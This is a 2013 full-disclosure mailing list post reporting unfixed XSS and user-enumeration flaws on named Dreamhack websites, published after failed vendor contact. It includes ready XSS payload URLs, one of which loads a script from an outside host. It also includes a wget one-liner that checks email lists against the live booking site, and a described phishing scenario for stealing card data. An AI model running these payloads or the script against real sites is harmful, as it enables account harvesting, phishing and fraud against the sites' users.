Date: Sat, 15 Jun 2013 14:52:17 +0200
From: klondike <klondike@...ndike.es>
To: full-disclosure@...ts.grok.org.uk
Subject: Various vulnerabilities on dreamhack related sites

Hi guys!

After various months persuading the guys at Dreamhack to fix a series of
issues in their websites without success I have decided to publish the
vulnerabilities in the hope the comunity will be aware of them an avoid
them. The date was chosen because today it's the opening of the
Dreamhack Summer edition. For those of you not knowing Dreamhack is the
biggest Lan Party in the world holding the World record of individual
devices connected to the network.

Going a little back forward some time ago I found two blind SQL
injections on the ticket vending site. These were fixed promptly, I
suppose because of the severity of them. By the end of november I had
found most of the issues disclosed on this e-mail, but despite notifying
them repeatedly they haven't fixed them nor shown any willingness to do
so hence this publication. The issues cover mainly XSS injections and
user enumerations.

For those with less knowledge, an XSS injection is an attack where HTML
code is injected in the target page, this is dangerous since arbitrary
javascript code can be run then to completely modify the web page or to
steal authentication data from unprotected cookies. An user enumeration
is an attack where the attacker can know which users are on the system
and which aren't. In this particular case we care about the attacker
knowing which of the e-mails from a list have been registered and which
aren't by seeing the responses the form gives on each case.

After this explanation, let's start with the attacks:

XSS in http://dreamhack.tv
It's possible to abuse the search field to inject arbitrary code in the
webpage since entities aren't scaped. Here are two examples
http://www.dreamhack.tv/?s=%3Cscript%3Ealert%28%27aaaa%27%29;%3C/script%3E
http://www.dreamhack.tv/?s=%3Cscript%20src=%22http://klondike.es/d.js%22%3E%3C/script%3E
the last one was used to show the severity of the issue to Robert Ohlén,
Dreamhack CEO. Despite this the issue remains unfixed to date.

Permanent XSS in https://crew.dreamhack.se
It's possible to abuse the address profile field (and maybe others) to
inject arbitrary code, an example can be found in
https://crew.dreamhack.se/users/eviltons.htm (you'll need to be
registrered on the system to see it). This is very dangerous since these
can't be filtered by browsers.

Permanent XSS in https://dreamhack.netadmin.se/cw/main/home.aspx
This is an internal portal where users can see statistics on their
traffic and compete for achievements, the users with more achievements
are marked as so. This is basically a showcase of netadmin's traffic
analysis stuff. This system had (and may still have) a permanent XSS
injection in the nick field used for registering which could even affect
the whole system if the unescaped code is shown in the top users. Since
this network is closed, the an image can be found at
http://img94.imageshack.us/img94/4499/jvl.png

User enumeration in http://bokning.dreamhack.se/
There is also a user enumeration on the forgot password field in the
booking system where tickets are bought. This can be used to guess which
users are registered either to send them more spam or to make a combined
attack using the previous XSS or other fishing methods. In the web there
are two of these attacks:

The first one (and the simplest to exploit) is at
http://bokning.dreamhack.se/?p=forgot_pass Below is a simple bash script
that will filter the e-mails from a list that are not registered.
while read i; do e="$(echo $i|sed -e 's/+/%2B/g' -e 's/@...0/g')"; wget
http://bokning.dreamhack.se/admin/admin.php
--referer="http://bokning.dreamhack.se/?p=forgot_pass" -q
--post-data="action=forgot_password&p=users&email=$e" -O- | tee lol.html
| fgrep "Kunde inte skicka l&ouml;senord. Emailen fanns inte." >
/dev/null || echo $i; done

A similar attack can be exploited on
http://bokning.dreamhack.se/?p=register in this case e.mails would be
sent to the users not registered on the system.

Finally it is possible to enumerate the users on the system since the
sequence numbers used for id are easy to guess, see
http://bokning.dreamhack.se/index.php?p=profile&id=1 (this parameter is
usually increased by one and no data is shown if the user is not in the
database for example:
http://bokning.dreamhack.se/index.php?p=profile&id=63377
http://bokning.dreamhack.se/index.php?p=profile&id=63378 and
http://bokning.dreamhack.se/index.php?p=profile&id=63379 or an invalid
user http://bokning.dreamhack.se/index.php?p=profile&id=200000 This
attack isn't that serious though and I didn't care about writting a
better PoC.

So many may ask if I can provide a practical usage case of these
attacks. I certainly can, the attacker would use any of the e-mail
enumeration attacks (probably the forgoten password one) to filter his
e-mail lists making a new list of users interested in Dreamhack. After
some time the attacker could then send phisin e-mails offering discount
tickets to these users with a link to one of the XSS affected sites
which could then be used to either steal his Credit Card information or
do fraudulent operations by selling non existent tickets.

There are of course a few good practices that can be followed to protect
yourself from some of these attacks. The first on is not following any
link to the affected sites to prevent XSS loads from acting. The second
is using tagged e-mails (if you e-mail supports them) when you register
in a web so user enumerations are harder to do, for example you could
register as nick+tag@...mple.com

Little more to say for now.
See ya!
Klondike


Download attachment "signature.asc" of type "application/pgp-signature" (264 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists